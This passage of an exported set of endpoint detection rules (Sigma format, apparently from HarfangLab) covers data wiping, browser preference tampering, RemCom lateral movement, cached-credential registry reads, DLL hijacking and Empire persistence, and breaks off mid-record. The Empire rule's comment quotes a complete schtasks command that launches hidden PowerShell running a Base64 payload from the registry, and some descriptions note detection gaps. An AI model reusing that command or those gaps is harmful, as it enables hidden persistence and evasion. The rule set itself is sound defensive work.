"rule_name": "Data Erased via cipher.exe",
"rule_description": "Detects data erased using cipher.exe.\nCipher.exe is a built-in Windows binary primarily used to encrypt/decrypt data on NTFS drives; it can also be used to overwrite deleted data on a disk.\nAdversaries may permanently delete files and artifacts left behind by the actions of their intrusion activity.\nIt is recommended to check if the process removing data has a legitimate reason to do so.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40e87c1e-7ced-4ba8-91fa-de32eb24ee6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617633Z",
"creation_date": "2026-03-23T11:45:34.617635Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617639Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_chrome_preferences_edited.yml",
"content": "title: Chrome-based Browser Preferences File Modified\nid: 40e87c1e-7ced-4ba8-91fa-de32eb24ee6d\ndescription: |\n Detects a suspicious modification to the Preferences file of Chrome and Chrome-based browsers (Edge, Brave, etc.).\n Adversaries may modify the browser's configuration in order to inject malicious ads during browsing.\n It is recommended to verify if the process performing the write operation has legitimate reasons to do so.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/12/11\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.ConfigChange\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'write'\n Path|startswith:\n - '/Users/*/Library/Application Support/Google/Chrome/'\n - '/Users/*/Library/Application Support/BraveSoftware/Brave-Browser/'\n - '/Users/*/Library/Application Support/Microsoft Edge/'\n - '/Users/*/Library/Application Support/com.operasoftware.Opera/'\n - '/Users/*/Library/Application Support/com.operasoftware.OperaGX/'\n - '/Users/*/Library/Application Support/Vivaldi/'\n Path|endswith:\n - '/Preferences'\n - '/Secure Preferences'\n ProcessImage|contains: '?'\n\n filter_chrome:\n Image:\n - '/Applications/Google 
Chrome*.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n filter_edge:\n Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox Media Plugin Helper'\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n exclusion_arc:\n Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n filter_brave:\n Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - '/Applications/Brave 
Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n filter_opera:\n Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n\n exclusion_tor_browser:\n Image:\n - '/*/Tor Browser*.app/Contents/MacOS/Tor/tor'\n - '/*/Tor Browser*.app/Contents/MacOS/firefox'\n - '/*/Tor Browser*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n\n exclusion_librewolf:\n Image:\n - '/*/LibreWolf*.app/Contents/MacOS/librewolf'\n - '/*/LibreWolf*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n\n exclusion_zen_browser:\n Image:\n - '/*/Zen Browser*.app/Contents/MacOS/zen'\n - '/*/Zen Browser*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '/*/Zen Browser*.app/Contents/MacOS/updater.app/Contents/MacOS/org.mozilla.updater'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40e87c1e-7ced-4ba8-91fa-de32eb24ee6d",
"rule_name": "Chrome-based Browser Preferences File Modified",
"rule_description": "Detects a suspicious modification to the Preferences file of Chrome and Chrome-based browsers (Edge, Brave, etc.).\nAdversaries may modify the browser's configuration in order to inject malicious ads during browsing.\nIt is recommended to verify if the process performing the write operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-12-11",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40eea7ed-b9cd-4cae-94cb-3ed700cef311",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090571Z",
"creation_date": "2026-03-23T11:45:34.090573Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090577Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_radmin_named_pipe_connection.yml",
"content": "title: RemCom Named Pipe Connected\nid: 40eea7ed-b9cd-4cae-94cb-3ed700cef311\ndescription: |\n Detects the connection to a Named Pipe pertaining to RemCom.\n RemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\n It is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\nreferences:\n - https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - attack.t1072\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Tool.RemCom\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName|endswith: '\\RemCom_communicaton'\n\n exclusion_system:\n ProcessName: 'system'\n\n # Exclusion for ADSelfService Plus\n # https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-remcomsvc-exe-is-detected-as-a-threat\n exclusion_adselfservice:\n # ADSelfService Plus use two backslashes in the command line\n ProcessCommandLine: '?:\\Windows\\\\\\\\RemComSvc.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n # exclusion from the client side\n exclusion_manageengine_client:\n # ..\\bin\\RemCom.exe \\\\YYYYYY /user:xxxx\\Manage_Engine_AD /pwd:* wmic logicaldisk list brief /format:\"%WINDIR%\\System32\\wbem\\en-us\\csv\"\n ProcessImage|endswith: '\\ManageEngine\\ADAudit Plus\\bin\\RemCom.exe'\n\n exclusion_manageengine_bundle:\n ProcessImage|endswith:\n - 'UEMS_CentralServer\\bin\\RemCom.exe'\n - '?:\\Windows\\SysWOW64\\RemComSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ZOHO 
Corporation Private Limited'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40eea7ed-b9cd-4cae-94cb-3ed700cef311",
"rule_name": "RemCom Named Pipe Connected",
"rule_description": "Detects the connection to the named pipe used by RemCom.\nRemCom is a remote management tool created with the goal of replacing PsExec: it deploys a service component (RemComSvc.exe) on the target host and exchanges commands and I/O with it over named pipes. The pipe name matched by this rule, RemCom_communicaton, is the spelling used by the tool itself and must not be \"corrected\".\nIt is recommended to determine if this tool is expected in your environment (several ManageEngine products bundle it, see the rule exclusions) and to investigate any commands launched by RemCom.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1072",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "410c0f21-4dbe-47b1-b477-4065e2398153",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095935Z",
"creation_date": "2026-03-23T11:45:34.095937Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095942Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials",
"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8",
"https://attack.mitre.org/techniques/T1003/005/"
],
"name": "t1003_002_susp_registry_read_mscache.yml",
"content": "title: Cached Domain Credentials Read from Registry\nid: 410c0f21-4dbe-47b1-b477-4065e2398153\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows cache information related to domain accounts.\n Adversaries may attempt to access cached domain credentials used to allow authentication in the event a domain controller is unavailable.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials\n - https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8\n - https://attack.mitre.org/techniques/T1003/005/\ndate: 2024/04/02\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.005\n - attack.discovery\n - attack.t1012\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKLM\\SECURITY\\CACHE\\'\n Image|contains: '?'\n\n # does not contain actual hashes\n filter_control:\n TargetObject: 'HKLM\\SECURITY\\Cache\\NL$Control'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n exclusion_velociraptor:\n ProcessImage: '?:\\Program 
Files\\Velociraptor\\Velociraptor.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "410c0f21-4dbe-47b1-b477-4065e2398153",
"rule_name": "Cached Domain Credentials Read from Registry",
"rule_description": "Detects a suspicious read operation on the registry keys under HKLM\\SECURITY\\Cache that store cached domain credentials (MSCache hashes), used to allow authentication when a domain controller is unavailable.\nAdversaries may attempt to read these keys to extract and crack the cached hashes.\nNote that reads by lsass.exe and by any signed process running from a Program Files directory are excluded, so a signed but malicious or side-loaded binary in those locations will not trigger this rule.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do so.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1003.005",
"attack.t1012",
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096427Z",
"creation_date": "2026-03-23T11:45:34.096429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_telnet.yml",
"content": "title: DLL Hijacking via telnetc.exe\nid: 412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5\ndescription: |\n Detects potential Windows DLL Hijacking via telnetc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'telnetc.exe'\n ImageLoaded|endswith: '\\security.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5",
"rule_name": "DLL Hijacking via telnetc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via telnetc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a writable location and planting a malicious DLL with the expected name (here security.dll) in the same folder.\nLoads from the Windows system directories (System32, SysWOW64, WinSxS) and DLLs signed by Microsoft Windows are filtered out by this rule.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "415ead88-88d6-4df2-97f3-ce11909c0e62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607086Z",
"creation_date": "2026-03-23T11:45:34.607089Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607097Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-8.0",
"https://cert.gov.ua/article/6276894",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_suspicious_process_started_by_powershell.yml",
"content": "title: Suspicious Process Started via PowerShell\nid: 415ead88-88d6-4df2-97f3-ce11909c0e62\ndescription: |\n Detects the use of the .NET \"[System.Diagnostics.Process]::Start()\" method from a PowerShell command line to execute a process.\n In December 2023, APT28 attackers were observed executing processes through PowerShell with this method (a .NET static method, not a cmdlet), passed directly on the command line.\n The match is performed on the process command line only, so the same call made from a script file or through a Base64-encoded command is not covered by this rule.\n It is recommended to investigate this command and the executed process to determine their legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-8.0\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/01/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PoweShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: '[system.Diagnostics.Process]::Start('\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "415ead88-88d6-4df2-97f3-ce11909c0e62",
"rule_name": "Suspicious Process Started via PowerShell",
"rule_description": "Detects the use of the .NET \"[System.Diagnostics.Process]::Start()\" method from a PowerShell command line to execute a process.\nIn December 2023, APT28 attackers were observed executing processes through PowerShell with this method (a .NET static method, not a cmdlet), passed directly on the command line.\nThe match is performed on the process command line only, so the same call made from a script file or through a Base64-encoded command is not covered by this rule.\nIt is recommended to investigate this command and the executed process to determine their legitimacy.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41b8f355-e9a0-4623-8e15-3ca931879b2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073294Z",
"creation_date": "2026-03-23T11:45:34.073296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073300Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BC-SECURITY/Empire",
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/software/S0363/"
],
"name": "t1053_005_empire_powershell_scheduled_task.yml",
"content": "title: PowerShell Empire Scheduled Task Persistence Added\nid: 41b8f355-e9a0-4623-8e15-3ca931879b2d\ndescription: |\n Detects the execution of a suspicious scheduled task related to the Empire attack framework.\n Empire is an open-source, cross-platform remote administration and post-exploitation framework where the post-exploitation agents are written in pure PowerShell for Windows.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://github.com/BC-SECURITY/Empire\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/software/S0363/\ndate: 2020/10/14\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.t1059.001\n - attack.s0363\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\system32\\schtasks.exe\" /Create /F /RU system /SC DAILY /ST 09:00 /TN Updater /TR \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\\Software\\Microsoft\\Network debug).debug)))\\\"\n CommandLine|contains|all:\n - '((gp '\n - '-NonI -W hidden -c '\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41b8f355-e9a0-4623-8e15-3ca931879b2d",
"rule_name": "PowerShell Empire Scheduled Task Persistence Added",
"rule_description": "Detects the creation, via schtasks.exe, of a scheduled task whose action matches the PowerShell stager used by the Empire attack framework's persistence modules: a non-interactive, hidden PowerShell command that typically reads its payload from a registry value.\nEmpire is an open-source, cross-platform remote administration and post-exploitation framework whose Windows post-exploitation agents are written in pure PowerShell.\nIt is recommended to investigate the command line performing this action and the registry value it references, and to remove the task if it cannot be attributed to a legitimate activity.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41d7267d-3dda-4c98-b61e-b8ef463ac92c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073093Z",
"creation_date": "2026-03-23T11:45:34.073096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en",
"https://github.com/mandiant/ccmpwn",
"https://attack.mitre.org/techniques/T1072/"
],
"name": "t1072_scnotification_config_write.yml",
"content": "title: Windows Session Hijacking via SCNotification.exe Prepared\nid: 41d7267d-3dda-4c98-b61e-b8ef463ac92c\ndescription: |\n Detects the modification of the SCNotification.exe configuration file.\n Adversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\n It is recommended to check the content of the SCNotification.exe.config to identify any malicious content.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en\n - https://github.com/mandiant/ccmpwn\n - https://attack.mitre.org/techniques/T1072/\ndate: 2024/07/30\nmodified: 2025/07/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1072\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_create_write:\n Kind:\n - 'write'\n - 'create'\n Path|endswith: '?:\\Windows\\CCM\\SCNotification.exe.config'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|endswith: 